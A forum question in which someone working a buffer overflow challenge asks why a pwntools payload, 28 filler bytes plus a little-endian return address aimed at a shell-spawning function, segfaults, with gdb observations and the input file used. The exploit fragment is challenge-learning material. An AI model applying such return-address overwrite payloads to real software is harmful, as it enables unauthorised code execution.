Understanding why this buffer overflow attack isn’t working


I’m doing a buffer overflow challenge, and I can’t understand what exactly I’m doing wrong. Through debugging, I managed to figure out how my input should look like such that I can force the program to return to a function. From gdb I figured if I entered “aaaaaaaaaaaaaaaaaaaaaaaaaaaacdefbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb” I can get the program to return to cdef of 0x66656463. Here’s a sc just in case: enter image description here As you can see, the program managed to go to 0x66656463. Now I the function’s address through gdb and I tried placing this in cdef’s spot in little endian order using pwntools:

payload = "a" * 28 + "\x56\x85\x04\x08" + "b"*47 msg = "-1\n" + payload  io.sendline(msg) 

The reason for the “-1\n” is because the program asks for input twice: the first time I just enter -1 and then the second input I try the exploit. So far, I’m just getting a segfault and the address I want to jump to should be starting a shell for me to exploit. I’m not sure what exactly I’m doing wrong, and any help would be appreciated. If I had to guess it’s that I’m somehow dealing with the two inputs incorrectly (they’re being read via fgets() in C if that matters.)

EDIT: I have the source binary and I tried running it locally. I created the following txt file

-1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaV\x85\x04\x08bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb 

and I redirect it in gdb via

run < <(cat input.txt) 

this works the same but whenever I add an escaped hex in place of the cdef, I get a different seg fault at a different address: enter image description here

It looks like if I replace any of the cdef with an escaped hex, I get a segfault at 0x08048726. Is something wrong with passing in the bytes?